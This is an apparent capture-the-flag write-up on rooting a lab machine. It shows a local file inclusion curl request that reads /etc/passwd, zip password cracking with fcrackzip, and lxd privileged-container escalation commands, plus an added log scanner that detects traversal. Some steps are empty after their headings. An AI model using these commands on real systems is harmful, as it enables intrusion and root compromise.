Enumeration:
Started by enumerating ports with nmap:
root@docker-desktop:~# ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.194 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
root@docker-desktop:~# nmap -sC -sV -p$ports 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 09:16 CEST
Nmap scan report for 10.10.10.194
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
Manually enumerated the web application on port 80 and found a URL that is vulnerable to local file inclusion:
root@docker-desktop:~# curl http://10.10.10.194/news.php?file=../../../../../etc/passwd | head -n 1
root:x:0:0:root:/root:/bin/bash
Tried some techniques to get RCE from LFI without success.
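The traversal request shown above leaves a clear trace in the web server's access log. As an added example (not part of the original writeup), this Python script scans Apache combined-format log lines for query parameters that, after URL decoding, contain directory traversal or point at a sensitive absolute path; the log lines and client IPs are constructed for the demonstration, and decoding is repeated a bounded number of times so double-encoded variants are not missed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined-log format; only the client IP, request target and status are needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Constructed sample log lines modelled on the LFI request above (not real server logs).
SAMPLE_LOG = """\
10.10.14.5 - - [22/Jun/2020:09:20:11 +0200] "GET /news.php?file=statement HTTP/1.1" 200 1432 "-" "curl/7.68.0"
10.10.14.5 - - [22/Jun/2020:09:21:03 +0200] "GET /news.php?file=../../../../../etc/passwd HTTP/1.1" 200 2043 "-" "curl/7.68.0"
10.10.14.5 - - [22/Jun/2020:09:21:40 +0200] "GET /news.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2043 "-" "curl/7.68.0"
10.10.14.5 - - [22/Jun/2020:09:22:15 +0200] "GET /news.php?file=%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 276 "-" "curl/7.68.0"
10.10.14.9 - - [22/Jun/2020:09:23:00 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def normalise(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded traversal is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def is_traversal(value):
    """True if the decoded value climbs out of its directory or names a sensitive absolute path."""
    v = normalise(value)
    return "../" in v or v.startswith("/etc/") or v.startswith("/proc/")

def find_lfi_attempts(log_text):
    """Return (ip, status, param, decoded_value) for each request whose query carries a traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            if is_traversal(value):
                hits.append((m.group("ip"), int(m.group("status")), param, normalise(value)))
    return hits

if __name__ == "__main__":
    for ip, status, param, value in find_lfi_attempts(SAMPLE_LOG):
        print(f"{ip} status={status} {param}={value}")
```

A 200 status on a flagged request means the include succeeded and the host should be treated as compromised, not merely probed.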
Afterwards, enumerated port 8080 and found some interesting stuff:
Intrusion:
With all that data, then searched for /etc/tomcat9/tomcat-users.xml:
Used metasploit tomcat_mgr_deploy to get the shell:
Privesc:
Then found a backup in /var/www/html:
ash@tabby:/var/www/html/files$ ls
16162020_backup.zip archive revoked_certs statement
Downloaded the file; it is apparently password protected, so cracked it:
root@docker-desktop:~/Downloads# fcrackzip -u -D -p /root/shared/wordlists/rockyou.txt 16162020_backup.zip
PASSWORD FOUND!!!!: pw == admin@it
Then logged in as ash using ssh and that password:
ash@tabby:/var/lib/tomcat9$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
As we saw with id (ash is a member of the lxd group), we can do privesc with lxc:
ash@tabby:/var/lib/tomcat9$ lxc image list
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| som | aa3de00946cd | no | alpine v3.12 (20200622_22:22) | x86_64 | CONTAINER | 2.97MB | Jun 22, 2020 at 6:48pm (UTC) |
+-------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
ash@tabby:/var/www/html/files$ lxc init som ignite -c security.privileged=true
ash@tabby:/var/www/html/files$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
ash@tabby:/var/www/html/files$ lxc start ignite
ash@tabby:/var/www/html/files$ lxc exec ignite /bin/sh
cd /mnt/root/root
ls
flag.txt